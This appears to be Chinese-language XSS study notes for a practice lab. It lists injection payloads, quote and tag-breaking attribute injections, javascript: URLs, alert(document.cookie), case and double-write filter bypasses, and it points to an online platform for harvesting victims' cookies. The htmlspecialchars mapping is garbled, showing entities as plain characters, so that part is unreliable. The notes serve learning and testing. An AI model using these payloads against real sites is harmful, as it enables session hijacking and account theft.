一、XSS平台
在线利用网站:
1、http://xsscom.com/
复制代码
输入复制的代码
查看获取到的cookie
二、xss触发方式
(1)在标签外:
<script>alert(1)</script>
(2)在标签内:
使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)
(1)12' onclick='alert(1)
在<a>标签内不能使用<script>标签,使用<img>标签
(2)123"><img src='1223' onclick=alert(1)><"
标签内资源类型是url使用伪协议javascript:alert(1)
三、XSS类型
XSS中文叫做跨站脚本攻击(Cross-site scripting),本名应该缩写为CSS,但是由于CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSS。
XSS(跨站脚本攻击)主要基于javascript(js)来完成恶意的攻击行为。
XSS是指恶意攻击者利用网站对用户提交的数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。
XSS危害:
- 1、盗取各类用户账户,如机器登录帐号、用户网银帐号、各类管理员帐号
- 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
- 3、盗窃企业重要的具有商业价值的资料
- 4、非法转账
- 5、强制发送电子邮件
- 6、网站挂马
- 7、控制受害者机器向其它网站发起攻击(重定向语句)
- 8、窃取cookie
(1)反射型xss(get/post)
1、 受害者访问攻击者构造的页面
2、 将攻击者构造的payload发送到后端,然后由后端再返回给前端
<script>alert(document.cookie)</script>
(2)存储型xss
将攻击者构造的恶意代码,存储到数据库中,并且在网站页面上自动执行代码。
<script>alert(1)</script>
(3)DOM型xss
需要用户点击
数据不到后端,直接由前端js进行处理
123456' onclick='alert(1)
在<a>标签内不能使用<script>标签,使用<img>标签
123"><img src='1223' onclick=alert(1)><"
使用伪协议javascript:alert(1)
DOM型xss-x
123"><img src='1223' onclick=alert(1)><"
xss:盲打
<script>alert(1)</script>
xss:过滤
大小写绕过<sCript>alert(1)</scRipt>
双写绕过123"><Scrscriptipt>alert(1)</sCrscriptipt>
xss:htmlspecialchars
htmlspecialchars转义特殊字符
&:转换为&
":转换为"
':转换为成为 '
<:转换为<
>:转换为>
12' onclick='alert(1)
使用伪协议javascript:alert(1)
xss:href
可以放置url
使用伪协议
javascript:alert(1)
xss:js
闭合<script>标签:</script><script>alert(1)</script> <script>